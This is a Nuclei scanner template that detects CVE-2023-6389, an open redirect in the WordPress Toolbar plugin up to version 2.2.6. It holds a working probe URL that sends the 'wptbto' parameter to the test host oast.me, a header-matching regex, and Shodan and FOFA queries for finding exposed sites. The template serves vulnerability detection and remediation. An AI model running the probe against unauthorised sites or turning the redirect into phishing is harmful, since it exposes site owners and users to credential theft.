CVE-2023-6389: WordPress Toolbar <= 2.2.6 - Open Redirect

id: CVE-2023-6389

info:
  name: WordPress Toolbar <= 2.2.6 - Open Redirect
  author: s4e-io
  severity: medium
  description: |
    The plugin redirects to any URL via the "wptbto" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
  impact: |
    Unauthenticated attackers can redirect users to malicious external sites via the wptbto parameter, potentially facilitating phishing attacks or credential theft.
  remediation: |
    Update WordPress Toolbar plugin to version 2.2.7 or later.
  reference:
    - https://wpscan.com/vulnerability/04dafc55-3a8d-4dd2-96da-7a8b100e5a81/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6389
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6389
    cwe-id: CWE-601
    epss-score: 0.52517
    epss-percentile: 0.97848
    cpe: cpe:2.3:a:abhinavsingh:wordpress_toolbar:*:*:*:*:*:*:wordpress:*
  metadata:
    verified: true
    max-request: 1
    vendor: abhinavsingh
    product: wordpress_toolbar
    shodan-query: http.html:/wp-content/plugins/wordpress-toolbar/
    fofa-query: body=/wp-content/plugins/wordpress-toolbar/
    publicwww-query: "/wp-content/plugins/wordpress-toolbar/"
  tags: wpscan,cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect,abhinavsingh,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wordpress-toolbar/toolbar.php?wptbto=https://oast.me&wptbhash=acme"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4a0a004730450220126890991b51857059b402591ba8184560bfa1f63ef0d586f3be2122e08fc5b90221009a7581d200603aa4645c1404cf706caf3777a779a381d6a1d9fbdaf47485306d:922c64590222798bb761d5b6d8e72950